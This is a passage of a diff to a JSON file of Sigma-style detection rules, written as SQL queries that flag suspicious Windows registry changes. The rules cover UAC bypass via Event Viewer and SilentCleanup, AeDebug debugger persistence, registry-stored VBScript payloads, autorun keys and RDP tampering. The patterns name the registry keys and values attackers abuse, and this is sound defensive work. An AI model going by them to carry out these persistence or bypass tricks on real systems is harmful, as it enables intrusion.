OneDrive) may serve new COM objects at user-level" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (NewValue LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((NewValue LIKE 
'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewValue LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "registry_set_persistence_search_order.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Potential Persistence Via Custom Protocol Handler", - "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "title": "Add Debugger Entry To AeDebug For Persistence", + "id": "092af964-4233-4373-b4ba-d86ea2890288", "status": "experimental", - "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. 
While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND NewValue LIKE 'URL:%' ESCAPE '\\') AND NOT ((NewValue LIKE 'URL:ms-%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_custom_protocol_handler.yml" + "filename": "registry_set_aedebug_persistence.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering", - "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": 
"experimental", - "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (NewValue LIKE '%Bypass%' ESCAPE '\\' OR NewValue LIKE '%RemoteSigned%' ESCAPE '\\' OR NewValue LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_execution_policy.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", - "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains 
filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "System Scripts Autorun Keys Modification", + "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "title": "VBScript Payload Stored in 
Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' 
ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": 
"Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "WinSock2 Autorun Keys Modification", + "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "New printer port install on host" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND 
NOT (NewValue = '(Empty)' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" }, { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" - }, - { - "title": "Suspicious Keyboard Layout Load", - "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "status": "test", - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (NewValue LIKE '%00000429%' ESCAPE '\\' OR NewValue LIKE '%00050429%' ESCAPE '\\' OR NewValue LIKE '%0000042a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_susp_keyboard_layout_load.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Classes Autorun Keys Modification", - "id": "9df5f547-c86a-433e-b533-f2794357e242", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + 
"attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewValue = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (NewProcessName 
LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "Enable Microsoft Dynamic Data Exchange", + "id": "63647769-326d-4dde-a419-b925cc0caf42", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1559.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD 
(0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_set_office_enable_dde.yml" }, { - "title": "Service Binary in Uncommon Folder", - "id": "277dc340-0540-42e7-8efb-5ff460045e07", - "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Sensitive Settings Changed to Zero", + "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", + "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 
'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_creation_service_uncommon_folder.yml" + "filename": "registry_set_terminal_server_suspicious.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". 
